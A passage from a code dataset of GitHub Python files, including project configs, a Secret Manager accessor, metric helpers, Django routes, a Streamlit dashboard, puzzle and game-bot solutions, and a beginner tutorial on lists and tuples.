'standardized')\nDATASET_FOLDER_PREPROCESSED = 
os.path.join(DATASET_FOLDER, 'preprocessed')\nDATASET_FOLDER_WEIGHTS = os.path.join(DATASET_FOLDER, 'weights')\nDATASET_FOLDER_WEIGHTS_FINAL = 'weights'\nDATASET_SUB_FOLDER_TRAINING = 'training'\nDATASET_SUB_FOLDER_VALIDATION = 'validation'\nDATASET_CATEGORIES = {\n '3d__printer_accessories': {'category_id': 127, 'main_category': '3d'},\n '3d__printer_extruders': {'category_id': 152, 'main_category': '3d'},\n '3d__printer_parts': {'category_id': 128, 'main_category': '3d'},\n '3d__printers': {'category_id': 126, 'main_category': '3d'},\n '3d__printing_tests': {'category_id': 129, 'main_category': '3d'},\n 'art__2d': {'category_id': 144, 'main_category': 'art'},\n 'art__tools': {'category_id': 75, 'main_category': 'art'},\n 'art__coins_badges': {'category_id': 143, 'main_category': 'art'},\n 'art__interactive': {'category_id': 78, 'main_category': 'art'},\n 'art__math': {'category_id': 79, 'main_category': 'art'},\n 'art__scans_replicas': {'category_id': 145, 'main_category': 'art'},\n 'art__sculptures': {'category_id': 80, 'main_category': 'art'},\n 'art__signs_logos': {'category_id': 76, 'main_category': 'art'},\n 'fashion__accessories': {'category_id': 81, 'main_category': 'fashion'},\n 'fashion__bracelets': {'category_id': 82, 'main_category': 'fashion'},\n 'fashion__costume': {'category_id': 142, 'main_category': 'fashion'},\n 'fashion__earrings': {'category_id': 139, 'main_category': 'fashion'},\n 'fashion__glasses': {'category_id': 83, 'main_category': 'fashion'},\n 'fashion__jewelry': {'category_id': 84, 'main_category': 'fashion'},\n 'fashion__keychains': {'category_id': 130, 'main_category': 'fashion'},\n 'fashion__rings': {'category_id': 85, 'main_category': 'fashion'},\n 'gadgets__audio': {'category_id': 141, 'main_category': 'gadgets'},\n 'gadgets__camera': {'category_id': 86, 'main_category': 'gadgets'},\n 'gadgets__computer': {'category_id': 87, 'main_category': 'gadgets'},\n 'gadgets__mobile_phone': {'category_id': 88, 'main_category': 'gadgets'},\n 'gadgets__tablet': {'category_id': 90, 'main_category': 'gadgets'},\n 'gadgets__video_games': {'category_id': 91, 'main_category': 'gadgets'},\n 'hobby__automotive': {'category_id': 155, 'main_category': 'hobby'},\n 'hobby__diy': {'category_id': 93, 'main_category': 'hobby'},\n 'hobby__electronics': {'category_id': 92, 'main_category': 'hobby'},\n 'hobby__music': {'category_id': 94, 'main_category': 'hobby'},\n 'hobby__rc_vehicles': {'category_id': 95, 'main_category': 'hobby'},\n 'hobby__robotics': {'category_id': 96, 'main_category': 'hobby'},\n 'hobby__sport_outdoors': {'category_id': 140, 'main_category': 'hobby'},\n 'household__bathroom': {'category_id': 147, 'main_category': 'household'},\n 'household__containers': {'category_id': 146, 'main_category': 'household'},\n 'household__decor': {'category_id': 97, 'main_category': 'household'},\n 'household__supplies': {'category_id': 99, 'main_category': 'household'},\n 'household__kitchen_dining': {'category_id': 100, 'main_category': 'household'},\n 'household__office_organization': {'category_id': 101, 'main_category': 'household'},\n 'household__outdoor_garden': {'category_id': 98, 'main_category': 'household'},\n 'household__pets': {'category_id': 103, 'main_category': 'household'},\n 'learning__biology': {'category_id': 106, 'main_category': 'learning'},\n 'learning__engineering': {'category_id': 104, 'main_category': 'learning'},\n 'learning__math': {'category_id': 105, 'main_category': 'learning'},\n 'learning__physics_astronomy': {'category_id': 148, 'main_category': 
'learning'},\n    'models__animals': {'category_id': 107, 'main_category': 'models'},\n    'models__buildings_structures': {'category_id': 108, 'main_category': 'models'},\n    'models__creatures': {'category_id': 109, 'main_category': 'models'},\n    'models__food_drink': {'category_id': 110, 'main_category': 'models'},\n    'models__furniture': {'category_id': 111, 'main_category': 'models'},\n    'models__robots': {'category_id': 115, 'main_category': 'models'},\n    'models__people': {'category_id': 112, 'main_category': 'models'},\n    'models__props': {'category_id': 114, 'main_category': 'models'},\n    'models__vehicles': {'category_id': 116, 'main_category': 'models'},\n    'tools__hand': {'category_id': 118, 'main_category': 'tools'},\n    'tools__machine': {'category_id': 117, 'main_category': 'tools'},\n    'tools__holders_boxes': {'category_id': 120, 'main_category': 'tools'},\n    'toys__chess': {'category_id': 151, 'main_category': 'toys'},\n    'toys__construction': {'category_id': 121, 'main_category': 'toys'},\n    'toys__dice': {'category_id': 122, 'main_category': 'toys'},\n    'toys__games': {'category_id': 123, 'main_category': 'toys'},\n    'toys__mechanical': {'category_id': 124, 'main_category': 'toys'},\n    'toys__playsets': {'category_id': 113, 'main_category': 'toys'},\n    'toys__puzzles': {'category_id': 125, 'main_category': 'toys'},\n    'toys__accessories': {'category_id': 149, 'main_category': 'toys'}\n}\n\nREQUEST_TIMEOUT = 30\n\nSTANDARDIZE_CONCURRENCY = 30\n\nTRAIN_EPOCHS = len(DATASET_CATEGORIES)\nTRAIN_INPUT_SIZE = 256\nTRAIN_STRATEGY = 'sigmoid'  # (relu, sigmoid)\nTRAIN_MODEL_FILE = 'model.h5'\n","repo_name":"AlbertSuarez/3d-net","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
+{"seq_id":"33262356930","text":"import os\n\nfrom google.cloud import secretmanager\n\n\ndef access_secret_key_version():\n    \"\"\"Access the payload for the given secret version if one exists.\"\"\"\n    if not os.getenv(\"GAE_APPLICATION\"):\n        return None\n\n    project_id = os.getenv(\"GOOGLE_CLOUD_PROJECT\")\n    secret_id = os.getenv(\"SECRET_ID\")\n\n    # Create the Secret Manager client.\n    client = secretmanager.SecretManagerServiceClient()\n\n    # Build the resource name of the secret version.\n    name = f\"projects/{project_id}/secrets/{secret_id}/versions/latest\"\n\n    # Access the secret version.\n    response = client.access_secret_version(request={\"name\": name})\n\n    # WARNING: Do not print the secret in a production environment - this\n    # snippet is showing how to access the secret material.\n    return response.payload.data.decode(\"UTF-8\")\n","repo_name":"Xcov19/covidX","sub_path":"covidX/gae_settings.py","file_name":"gae_settings.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"}
+{"seq_id":"20351018573","text":"from MLPackage.ML_Functions import functionSampling\r\n\r\ndef FactoryML(filename):\r\n    with open(filename, 'r') as f:\r\n        name_list = f.readlines()\r\n\r\n    result = []\r\n    for i in name_list:\r\n        # strip the newline character\r\n        i = i.strip()\r\n        result.append(i)\r\n    return result\r\n# Example usage:\r\n# filename = \"config.txt\"\r\n# model_list = FactoryML(filename)\r\n# for i in model_list:\r\n#     
functionSampling(i)","repo_name":"wanghan79/2023_Master_Python","sub_path":"2022103261-李德洋/myhomework/homework3/Factory.py","file_name":"Factory.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"30244408267","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import *\n\n\ndef mean_absolute_percentage_error(y_true, y_pred):\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\n\n\ndef get_metrics(sets_dict):\n metrics_df = pd.DataFrame()\n\n for set_key, tupla in sets_dict.items():\n custom_metrics = {\n 'R2': r2_score(*tupla),\n 'Explained variance': explained_variance_score(*tupla),\n 'Max error': max_error(*tupla),\n 'Mean absolute error': mean_absolute_error(*tupla),\n 'Median absolute error': median_absolute_error(*tupla),\n 'Mean absolute precentage error': \\\n mean_absolute_percentage_error(*tupla),\n 'Mean squared error': mean_squared_error(*tupla),\n 'Root mean squared error': np.sqrt(mean_squared_error(*tupla)),\n }\n\n row_df = pd.Series(custom_metrics).to_frame().T.round(4)\n row_df.rename(columns={0: 'Score'}, inplace=True)\n\n metrics_df = metrics_df.append(row_df)\n\n metrics_df.index = list(sets_dict.keys())\n\n return metrics_df.T\n\n","repo_name":"guillecg/mlops","sub_path":"utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31195207693","text":"from django.urls import path\nfrom .views import (\n BoardCreateAPI, TaskEditAPI, UpdateBoardAPI, TaskCreateAPI, UserRegisterAPI,\n GetBoardDataAPI, ShareBoard, VerifyCode\n)\n\nurlpatterns = [\n path('verify/', VerifyCode.as_view()),\n\n path('register/', UserRegisterAPI.as_view()),\n path('share/', ShareBoard.as_view()),\n path('task/detail//', TaskEditAPI.as_view()),\n path('get/board-data/', GetBoardDataAPI.as_view()),\n path('create-board/', BoardCreateAPI.as_view()),\n path('update-board//', UpdateBoardAPI.as_view()),\n path('create-task/', TaskCreateAPI.as_view())\n]","repo_name":"sardor7414/menegment-system","sub_path":"v1/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1815269696","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndataframe = pd.read_csv('day.csv', delimiter=',')\n\n\ndef tenant(dataframe):\n springer = dataframe[dataframe['season'] == 1]\n summer = dataframe[dataframe['season'] == 2]\n fall = dataframe[dataframe['season'] == 3]\n winter = dataframe[dataframe['season'] == 4]\n total_tenant = [springer['cnt'].sum(), summer['cnt'].sum(),\n fall['cnt'].sum(), winter['cnt'].sum()]\n return total_tenant\n\n\ndef trend(dataframe, window_size=30):\n tenant = dataframe['cnt']\n window_size = window_size\n i = 0\n moving_averages = []\n while i < len(tenant) - window_size + 1:\n window_average = round(np.sum(tenant[\n i:i+window_size]) / window_size, 2\n )\n moving_averages.append(window_average)\n i += 1\n return moving_averages\n\n\ndef indice_season(dataframe):\n indices_season = []\n indices_prev_season, prev_season = 0, 1\n for i, season in enumerate(dataframe['season']):\n if season != prev_season:\n indices_season.append([indices_prev_season, i])\n prev_season = season\n indices_prev_season = i+1\n return indices_season\n\n\ndef 
vis_musim(dataframe):\n total_tenant = tenant(dataframe)\n moving_averages = trend(dataframe, window_size=30)\n indices_season = indice_season(dataframe)\n legend = ['trend', 'Musim Semi', 'Musim Panas',\n 'Musim Gugur', 'Musim Dingin']\n season = ['Musim Semi', 'Musim Panas', 'Musim Gugur', 'Musim Dingin']\n seasonCode = [125, 300, 475, 675]\n\n plt.style.use(\"ggplot\")\n fig, ax = plt.subplots(2, 1, figsize=(20, 14))\n bars = ax[0].bar(seasonCode, total_tenant, width=80,\n color='#A6FF96', alpha=0.5)\n ax[0].set_title(\"Visualisasi jumlah penyewa bergantung pada musim\",\n fontsize=30, fontweight='bold')\n ax[0].set_ylabel(\"Total Jumlah Penyewa\", fontsize=18, fontweight='bold')\n ax[0].set_xticks(seasonCode)\n ax[0].set_xticklabels(season, fontsize=18, fontweight='bold')\n max_index = total_tenant.index(max(total_tenant))\n bars[max_index].set_color('#16FF00')\n\n for bar in bars:\n height = bar.get_height()\n ax[0].annotate(f'{int(height)}',\n xy=(bar.get_x() + bar.get_width() / 2, height-9000),\n xytext=(0, 3),\n textcoords=\"offset points\",\n fontsize=14,\n ha='center', va='bottom')\n\n ax[1].plot(dataframe['instant'][0:len(moving_averages)],\n moving_averages, linewidth=2, color='red')\n ax[1].set_xlabel(\"Recorded day\", fontsize=18, fontweight='bold')\n ax[1].set_ylabel(\"Jumlah Penyewa\", fontsize=18, fontweight='bold')\n\n colors = ['green', '#2B3A55', 'blue', 'yellow']\n c = 0\n for val in indices_season:\n i, j = val\n color = colors[c]\n ax[1].axvspan(i, j, color=color, alpha=0.3)\n if color == \"yellow\":\n c = -1\n c += 1\n plt.legend(legend, loc='upper center', fontsize=15)\n return fig\n\n# create visualization function\n\n\ndef vis(dataframe, filt, data, Code, explode, title):\n pie_result = dataframe.groupby(filt)['cnt'].sum().tolist()\n data = data\n Code = Code\n\n fig, ax = plt.subplots(1, 2, figsize=(\n 20, 14), gridspec_kw={'width_ratios': [2, 3]})\n bars = ax[0].bar(data, pie_result, color='#186F65')\n ax[0].set_xticks(data)\n ax[0].set_xticklabels(Code, fontsize=21, fontweight='bold')\n\n for bar in bars:\n height = bar.get_height()\n ax[0].annotate(f'{int(height)}',\n xy=(bar.get_x() + bar.get_width() / 2, height-9000),\n xytext=(0, 3),\n textcoords=\"offset points\",\n fontsize=20,\n ha='center', va='bottom')\n\n explode = explode\n\n pie_result, texts, autotexts = ax[1].pie(\n pie_result,\n labels=Code,\n autopct='%1.2f%%',\n colors=['#186F65', '#FFA33C'],\n explode=explode,\n startangle=110,\n labeldistance=0.35,\n pctdistance=0.7)\n\n for t in texts:\n t.set_fontsize(20)\n t.set_color('white')\n t.set_fontweight('bold')\n\n for text in autotexts:\n text.set_fontsize(20)\n text.set_color('white')\n text.set_fontweight('bold')\n\n plt.axis('equal')\n\n fig.suptitle(title, fontsize=29, fontweight='bold')\n return fig\n\n\nworkingDay = vis(dataframe,\n 'workingday',\n data=[0, 1],\n Code=['Holiday', 'Workingday'],\n explode=(0, 0.1),\n title='Jumlah Penyewa Sepeda berdasarkan hari kerja'\n )\nweather = vis(dataframe,\n 'weathersit',\n data=[1, 2, 3],\n Code=['Clear', 'Cloudy', 'Light Rain'],\n explode=None,\n title='Jumlah Penyewa Sepada berdasarkan Musim')\n\nst.title('Dicoding Submission - Explore Insight on Bicycle Sharing System')\nst.caption('Nama: Dimas Zuda Fathul Akhir')\nst.caption('Email: dimas.zuda45@gmail.com')\n\ndf, visualize = st.tabs(['DataFrame', 'Visualisasi'])\n\nlist = {'Musim', 'Hari Kerja', 'Cuaca'}\nwith df:\n st.write(\"This is the dataset of the Daily Bike Sharing\")\n st.dataframe(dataframe)\n\nwith visualize:\n option = 
st.selectbox(\n 'Gain Insight',\n options=list\n )\n if option == 'Musim':\n fig = vis_musim(dataframe)\n st.pyplot(fig)\n elif option == 'Hari Kerja':\n st.pyplot(workingDay)\n else:\n st.pyplot(weather)\n","repo_name":"dimaszuda/Belajar-Data-Science-dengan-Python","sub_path":"dashboard/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1554982520","text":"import re\nimport numpy as np\n\nwith open('input.txt','r') as f:\n data = f.readlines()\n\npoints = set()\nfolds = []\nfor line in data:\n line = line[:-1]\n if len(line) == 0:\n continue\n if line[0] != 'f':\n pointCoords = line.split(',')\n points.add((int(pointCoords[0]),int(pointCoords[1])))\n else:\n regex = r'fold along (x|y)=([0-9]+)'\n m = re.match(regex,line)\n folds.append((m.group(1),int(m.group(2))))\n\n# =============================================================================\n# PART 1\n# =============================================================================\n\ndef applyFold(points,fold):\n dim,value = fold\n \n newPoints = set()\n if dim == 'x': \n for point in points:\n if point[0] > value:\n newPoints.add((point[0]-2*(point[0]-value),point[1]))\n else:\n newPoints.add((point[0],point[1]))\n else:\n for point in points:\n if point[1] > value:\n newPoints.add((point[0],point[1]-2*(point[1]-value)))\n else:\n newPoints.add((point[0],point[1])) \n \n return newPoints\n \n\n \nnewPoints = applyFold(points,folds[0])\nprint(len(newPoints)) # 708\n\n# =============================================================================\n# PART 2\n# =============================================================================\n\nnewPoints = points\nfor fold in folds:\n newPoints = applyFold(newPoints,fold)\n \nxSize = max(map(lambda x: x[0],newPoints))+1\nySize = max(map(lambda x: x[1],newPoints))+1\n\narray = np.zeros([xSize,ySize],dtype='bool')\n\nfor x,y in newPoints:\n array[x,y] = True\n\nfor j in range(ySize):\n for i in range(xSize):\n print('#' if array[i,j] else '.', end='')\n print('\\n',end='')\n \n# prints EBLUBRFH","repo_name":"GiM6114/Advent-of-Code-2021","sub_path":"Day_13/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20406734043","text":"import sys\nimport random\nfrom operator import attrgetter\n\nfeature_only_2_remaining = False\n\n#weights = [('finish_it', 16), ('planet_bonus_score', 8) , ('score', 4), ('planet.colonization_score', 2) , ('planet_tasks_sum', 1)]\nweights = [('finish_it', 16), ('planet_bonus_score', 8) , ('score', 4), ('planet_tasks_sum', 1)]\n\nbonus_ranking_by_points = {\n \"POINTS_3\": 16,\n \"POINTS_2\": 15, \n \"POINTS_1\": 14,\n \"TECH_RESEARCH_2\": 9,\n \"TECH_RESEARCH_3\": 8,\n \"TECH_RESEARCH_4\": 7,\n \"ENERGY_CORE\": 4,\n \"ALIEN_ARTIFACT\": 0\n}\n\nbonus_ranking_by_tech = {\n \"TECH_RESEARCH_2\": 16,\n \"TECH_RESEARCH_3\": 15,\n \"TECH_RESEARCH_4\": 14,\n \"POINTS_3\": 4,\n \"POINTS_2\": 4, \n \"ENERGY_CORE\": 4,\n \"POINTS_1\": 4,\n \"ALIEN_ARTIFACT\": 4\n}\n\nnumber_of_objectives_reached_before_we_target_point = 1\n\nclass Game:\n def __init__(self):\n self.sector_index = 0\n self.station_objectives = {}\n self.my_stations = []\n self.opp_stations = []\n self.planets = []\n self.my_bonuses = []\n self.opp_bonuses = []\n self.my_colonization_score = 0\n self.opp_colonization_score = 0\n self.reset()\n\n def 
reset(self):\n        self.current_station_index = -1\n        self.my_stations.sort(key=attrgetter('remaining_upgrades'))\n\n    @staticmethod\n    def tech_first(objectives_reached):\n        return (objectives_reached < number_of_objectives_reached_before_we_target_point)\n\n    def get_objectives_reached(self):\n        count = 0\n        for station in self.my_stations:\n            reached = True\n            for i in range(len(station.tech)):\n                if (station.tech[i] < self.get_station_objective_by_id(station.id).tech_objectives[i]):\n                    reached = False\n            if reached:\n                count += 1\n        return count\n\n    def get_station_objective_by_id(self, station_id):\n        return self.station_objectives[str(station_id)]\n\n    def get_next_active(self):\n        if (self.current_station_index+1 < len(self.my_stations)):\n            for i in range(self.current_station_index+1, len(self.my_stations)):\n                if self.my_stations[i].available:\n                    self.current_station_index = i\n                    return self.my_stations[i]\n        return None\n\n    def get_next_station(self):\n        return self.get_next_active()\n\n    def get_first_valid_planet(self, station):\n        for planet in self.planets:\n            if self.should_colonize_planet(planet, station):\n                return planet\n        return None\n\n    def is_planet_not_already_lost(self, planet):\n        total_tasks = planet.my_contribution + planet.opp_contribution + planet.tasks_remaining()\n        if total_tasks / 2 >= planet.opp_contribution:\n            return True\n        else:\n            return False\n\n    def can_use_station_techs_on_planet(self, planet, station):\n        for i in range(len(planet.tasks)):\n            if planet.tasks[i] > 0 and station.tech[i] > 0:\n                return True\n        return False\n\n    # go_for_it defaults to False so callers that omit it (e.g. get_first_valid_planet) keep working\n    def should_colonize_planet(self, planet, station, go_for_it=False):\n        colonize = self.is_planet_not_already_lost(planet) and self.can_use_station_techs_on_planet(planet, station)\n        if colonize and feature_only_2_remaining:\n            if len(self.planets) == 2 and (planet.my_contribution + planet.opp_contribution) == 0:\n                colonize = False\n        if not colonize and go_for_it:\n            if planet.my_contribution == 0:\n                colonize = True\n        return colonize\n\n    def get_best_planet(self, station):\n        return self.get_first_valid_planet(station)\n\n    def get_best_tech_from_station(self, tech_level, station):\n        print(\"Station:\", station, file=sys.stderr, flush=True)\n        station_objective = self.get_station_objective_by_id(station.id)\n        for i in range(len(station.tech)):\n            print(\"i:\", i, \"tech_level:\", tech_level, \"current_tech_level:\", station.tech[i], \"station_tech_objective:\", station_objective.tech_objectives[i], file=sys.stderr, flush=True)\n            target_level = station.tech[i] + 1\n            print(\"bool1:\", (target_level == tech_level), \"bool2:\", (station.tech[i] < station_objective.tech_objectives[i]), file=sys.stderr, flush=True)\n            if (target_level == tech_level) and (station.tech[i] < station_objective.tech_objectives[i]):\n                print(\"made it\", file=sys.stderr, flush=True)\n                return station, i\n        return None, None\n\n    def get_best_station_from_tech(self, tech_level):\n        #if Game.tech_first(self.get_objectives_reached()):\n        if False:\n            station = self.my_stations[0]\n            return self.get_best_tech_from_station(tech_level, station)\n        else:\n            for station in self.my_stations:\n                best_station, i = self.get_best_tech_from_station(tech_level, station)\n                if best_station is not None:\n                    return best_station, i\n        return None, None\n\n    def get_energy_core_command_line(self):\n        if (\"ENERGY_CORE\" in self.my_bonuses):\n            return 'ENERGY_CORE'\n        return None\n\n    def get_tech_research_command_line(self, bonus, tech_level):\n        station, tech_id = self.get_best_station_from_tech(tech_level)\n        if station is None or tech_id is 
None:\n tech_level = 1\n station, tech_id = self.get_best_station_from_tech(tech_level)\n if station is not None:\n if (station.tech[tech_id] > 0):\n return \"TECH_RESEARCH {0} {1}\".format(station.id, tech_id)\n else:\n return \"NEW_TECH {0} {1} {2}\".format(station.id, tech_id, bonus)\n return None\n\n def get_alien_artifact_command_line(self):\n if (\"ALIEN_ARTIFACT\" in self.my_bonuses):\n tech_id_1 = random.randint(0,3)\n tech_id_2 = random.randint(0,3)\n while (tech_id_2 == tech_id_1):\n tech_id_2 = random.randint(0,3)\n return \"ALIEN_ARTIFACT {0} {1}\".format(tech_id_1, tech_id_2)\n return None\n\n def get_best_bonus(self):\n for bonus in self.my_bonuses:\n if bonus not in [\"POINTS_1\", \"POINTS_2\", \"POINTS_3\", \"ENERGY_CORE\"]:\n return bonus\n return None\n\n def get_bonus_command_line(self, objectives_reached):\n print(\"get_bonus_command_line, obj:\", objectives_reached, \"len bonuses:\", len(self.my_bonuses), file=sys.stderr, flush=True)\n if (Game.tech_first(objectives_reached) and len(self.my_bonuses) > 0):\n # If TECH bonus: apply based on objective to TECH_RESEARCH\n # If not TECH bonus: apply based on objective to NEW_TECH\n for bonus in self.my_bonuses:\n if \"TECH_RESEARCH\" in bonus:\n command = self.get_tech_research_command_line(bonus, int(bonus[-1]))\n else:\n command = self.get_tech_research_command_line(bonus, 1)\n if command is not None:\n return command\n else:\n bonus = self.get_best_bonus()\n if bonus == \"TECH_RESEARCH_2\":\n return self.get_tech_research_command_line(bonus, 2)\n elif bonus == \"TECH_RESEARCH_3\":\n return self.get_tech_research_command_line(bonus, 3)\n elif bonus == \"TECH_RESEARCH_4\":\n return self.get_tech_research_command_line(bonus, 4)\n elif bonus == \"ALIEN_ARTIFACT\":\n return self.get_tech_research_command_line(bonus, 1)\n return None\n\n def get_best_preferred_bonus(self, planet, objectives_reached):\n if (not Game.tech_first(objectives_reached)):\n if bonus_ranking_by_points[planet.bonuses[0]] > bonus_ranking_by_points[planet.bonuses[1]]:\n return 0\n else:\n return 1\n else:\n if bonus_ranking_by_tech[planet.bonuses[0]] > bonus_ranking_by_tech[planet.bonuses[1]]:\n return 0\n else:\n return 1\n\n\n def get_action(self):\n # main actions: COLONIZE | RESUPPLY\n # bonus actions: ENERGY_CORE | ALIEN_ARTIFACT | TECH_RESEARCH | NEW_TECH\n\n bonus_command_line = self.get_bonus_command_line(self.get_objectives_reached())\n if bonus_command_line is not None:\n return bonus_command_line\n else:\n combos = []\n for station in self.my_stations:\n if station.available:\n for planet in self.planets:\n combos.append(Combo(station, planet, self.get_objectives_reached()))\n combos.sort(key=attrgetter('finish_it', 'planet_bonus_score', 'score', 'planet.colonization_score', 'planet_tasks_sum'), reverse=True)\n\n for combo in combos:\n if self.should_colonize_planet(combo.planet, combo.station, go_for_it=False):\n bonus = self.get_best_preferred_bonus(combo.planet, self.get_objectives_reached())\n return \"COLONIZE {0} {1} {2}\".format(combo.station.id, combo.planet.id, bonus)\n\n #for combo in combos:\n # if self.should_colonize_planet(combo.planet, combo.station, go_for_it=True):\n # bonus = self.get_best_preferred_bonus(combo.planet, self.get_objectives_reached())\n # return \"COLONIZE {0} {1} {2}\".format(combo.station.id, combo.planet.id, bonus)\n\n energy_core_command_line = self.get_energy_core_command_line()\n if energy_core_command_line is not None:\n return energy_core_command_line\n return 'RESUPPLY'\n\nclass StationObjective:\n def 
__init__(self, id, mine, objective_score, tech_objectives):\n self.id = id\n self.mine = mine\n self.objective_score = objective_score\n self.tech_objectives = tech_objectives\n\nclass Station:\n def __init__(self, id, mine, available, tech, objective_score, tech_objectives):\n self.id = id\n self.mine = mine\n self.available = available\n self.tech = tech\n self.tech_objectives = tech_objectives\n self.objective_score = objective_score\n self.remaining_upgrades = 0\n self.set_remaining_upgrades()\n\n def set_remaining_upgrades(self):\n for i in range(len(self.tech)):\n self.remaining_upgrades += (self.tech_objectives[i] - self.tech[i])\n\nclass Planet:\n def __init__(self, planet_id, tasks, my_contribution, opp_contribution, colonization_score, bonuses):\n self.id = planet_id\n self.tasks = tasks\n self.my_contribution = my_contribution\n self.opp_contribution = opp_contribution\n self.colonization_score = colonization_score\n self.bonuses = bonuses\n \n def tasks_remaining(self):\n return self.tasks[0] + self.tasks[1] + self.tasks[2] + self.tasks[3]\n\n def bonus_score(self, objectives_reached):\n if (not Game.tech_first(objectives_reached)):\n if bonus_ranking_by_points[self.bonuses[0]] > bonus_ranking_by_points[self.bonuses[1]]:\n return bonus_ranking_by_points[self.bonuses[0]]\n else:\n return bonus_ranking_by_points[self.bonuses[1]]\n else:\n if bonus_ranking_by_tech[self.bonuses[0]] > bonus_ranking_by_tech[self.bonuses[1]]:\n return bonus_ranking_by_tech[self.bonuses[0]]\n else:\n return bonus_ranking_by_tech[self.bonuses[1]]\n\nclass Combo:\n def __init__(self, station, planet, objectives_reached):\n self.id = id\n self.station = station\n self.planet = planet\n self.score = 0\n self.set_score()\n self.planet_tasks_sum = 16 - self.planet.tasks_remaining()\n self.planet_bonus_score = self.planet.bonus_score(objectives_reached)\n self.finish_it = 0\n self.set_finish_it()\n self.weighted_score = 0\n self.set_weighted_score()\n\n def set_score(self):\n self.score = 0\n for i in range(4):\n self.score += min(self.planet.tasks[i], self.station.tech[i])\n \n def set_finish_it(self):\n self.finish_it = 0\n can_finish = True\n for i in range(4):\n if (self.planet.tasks[i] > self.station.tech[i]):\n can_finish = False\n if can_finish and self.planet.opp_contribution == 0:\n self.finish_it = 16\n \n def set_weighted_score(self):\n score = 0\n for attribute, weight in weights:\n score += self.__getattribute__(attribute) * weight\n self.weighted_score = score\n\n\ngame = Game()\n\nfor i in range(8):\n # objective_score: receive these points if tech level objectives are met\n station_id, mine, objective_score, obj_0, obj_1, obj_2, obj_3 = [int(j) for j in input().split()]\n station_objective = StationObjective(station_id, mine, objective_score, [obj_0, obj_1, obj_2, obj_3])\n game.station_objectives[str(station_id)] = station_objective\n\n# game loop\nwhile True:\n sector_index = int(input())\n game.sector_index = sector_index\n\n game.my_stations = []\n game.opp_stations = []\n for i in range(8):\n station_id, mine, available, tech_0, tech_1, tech_2, tech_3 = [int(j) for j in input().split()]\n station_objective = game.get_station_objective_by_id(station_id)\n station = Station(station_id, mine, available, [tech_0, tech_1, tech_2, tech_3],\n station_objective.objective_score, station_objective.tech_objectives)\n if mine:\n game.my_stations.append(station)\n else:\n game.opp_stations.append(station)\n \n game.planets = []\n planet_count = int(input())\n for i in range(planet_count):\n inputs = 
input().split()\n        planet_id = int(inputs[0])\n        tasks_0 = int(inputs[1])\n        tasks_1 = int(inputs[2])\n        tasks_2 = int(inputs[3])\n        tasks_3 = int(inputs[4])\n        my_contribution = int(inputs[5])  # the amount of tasks you have already completed\n        opp_contribution = int(inputs[6])\n        colonization_score = int(inputs[7])  # points awarded to the colonizer having completed the most tasks\n        bonus_0 = inputs[8]\n        bonus_1 = inputs[9]\n        planet = Planet(planet_id, [tasks_0, tasks_1, tasks_2, tasks_3], my_contribution, opp_contribution, colonization_score, [bonus_0, bonus_1])\n        game.planets.append(planet)\n\n    bonus_count = int(input())  # bonuses in both you and your opponent's inventories\n    game.my_bonuses = []\n    game.opp_bonuses = []\n    for i in range(bonus_count):\n        inputs = input().split()\n        mine = int(inputs[0])\n        bonus = inputs[1]\n        if mine:\n            game.my_bonuses.append(bonus)\n        else:\n            game.opp_bonuses.append(bonus)\n    game.my_colonization_score = int(input())  # points from planet colonization, does not include bonus points\n    game.opp_colonization_score = int(input())\n\n    game.reset()\n\n    action = game.get_action()\n    # Write an action using print\n    # To debug: print(\"Debug messages...\", file=sys.stderr, flush=True)\n    print(action)\n","repo_name":"rkazma14/codinggame2k1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"39427352726","text":"# List and tuple: these are the containers in Python that store data such as strings, ints, floats or booleans\n\n# List\n\n# Initialize a list \nMy_List_1 = [1,5,3,4,2]\n\n# print(My_List_1)\n\n# This code simply prints the items inside the list container\n\n# List indexing\n\n'''\nA list can be indexed the same way a string is indexed\n\n1. [0:] - Here the items are printed from the 0th index to the end of the list\n\n2. [0::2] - Here the items are printed from the 0th index to the end of the list keeping \na gap of 2 indices\n\n! Both methods are shown below\n'''\n\n# 1. 
\n\n# print(My_List_1[0:])\n\n# another \n\n# print(My_List_1[:2])\n\n# 2.\n\n# print(My_List_1[0::3]) \n\n\n# Functions on the List\n\n# My_List_1.sort() # Sort the list, i.e. arrange the list items in ascending order\n\n# My_List_1.reverse() # The reverse function reverses the order of the items in the list\n\nappending_object = 72\n\n# My_List_1.append(appending_object) # Append or add an object at the end of the list\n\nMy_List_1.insert(3, appending_object)\n\n# Deleting functions: pop and remove\n\n'''\n.pop removes the element at the given index of the list\n\n.remove removes the element whose value is given as the parameter\n'''\n\n# print(My_List_1)\n\n\n\n'''\nTuple\n\nTuple is a data type in which you can store data and is immutable\n\nTuple is the fastest array in Python\n\nInitializing a tuple looks like this: ()\n\n'''\n\nMy_Tuple = (1,2,3,4,5,6,6,5,4,3,2,1)\n\n# print(My_Tuple)\n\n\nprint(My_Tuple.index(5))\n\n'''\nIf you try to change the tuple you will get TypeError: \n\n'tuple' object does not support item assignment\n\nhere item assignment means changing an item\n\nHere the count function gives the number of occurrences of the given object in a tuple or list\n\nHere the index function gives the index of the given value in the data 